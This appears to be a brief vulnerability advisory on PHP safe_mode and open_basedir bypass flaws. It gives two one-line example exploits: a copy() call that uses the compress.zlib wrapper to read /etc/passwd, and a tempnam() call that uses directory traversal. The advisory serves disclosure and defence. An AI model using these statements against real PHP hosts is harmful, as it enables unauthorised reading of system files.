PHP Multiple Safe_Mode and Open_Basedir Restriction Bypass Vulnerabilities
Attackers may exploit these issues with standard PHP code. An example statement exploiting the 'copy()' issue is available: copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt"); An example statement exploiting the 'tempnam()' issue is available: tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd"); The following exploit is available: |
Privacy Statement |